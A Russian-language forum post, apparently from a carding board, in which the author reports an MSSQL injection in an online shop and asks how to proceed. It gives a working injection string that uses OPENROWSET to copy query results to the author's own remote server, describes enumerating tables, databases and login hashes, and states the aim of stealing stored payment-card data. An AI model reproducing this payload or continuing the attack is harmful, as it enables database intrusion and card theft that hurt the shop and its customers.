Здравствуйте!

Нашёл mssql-иньекцию в одном интернет-магазинчике.
Выборку данных оттуда произвожу добавлением в строку запроса подобной штуки:

;insert+into+openrowset('sqloledb','uid=user3000;p wd=pass3000;network=DBMSSOCN;Address=777.777.103.4 ','select+line+from+base3000..tbltest')+select+tab le_name+from+information_schema.tables;--

Таким образом получаю данные на свой сервак. Страница просто перезагружается, данные заливаются ко мне, ошибки не происходит. Все довольны.

В текущей базе есть таблица Orders. В не хранится картон, но есть колонка CCOrderID. Я предполагаю, что картон хранится в другой таблице.

При заказе и оплате картон поля с реквизитами карты передаются в ccorder.asp.

Есть базы данных с именем cybersales. Думаю карты там.

Запрос select+table_name+from+cybersales.information_sche ma.tables не выполняется. Не просто не выдаёт результат на мой сервер, а именно не выполняется. Об этом я сужу по тому, что мне выдаётся HTTP 500 - Internal server error:The page cannot be displayed. А когда запрос корректно выполняется, то просто происходит перезагрузка страницы.

Видимо у текущего пользователя нет прав на просморт бд cybersales.

Делаю запрос select+name+from+master..syslogins. Получаю все логины. Есть cybersalesuser.

Запрос select+password+from+master..sysxlogins выполняется но ничего не выдаёт на мой сервер.

Каковы мой дальнейшие действия? Хочется добраться до картона. Спасибо!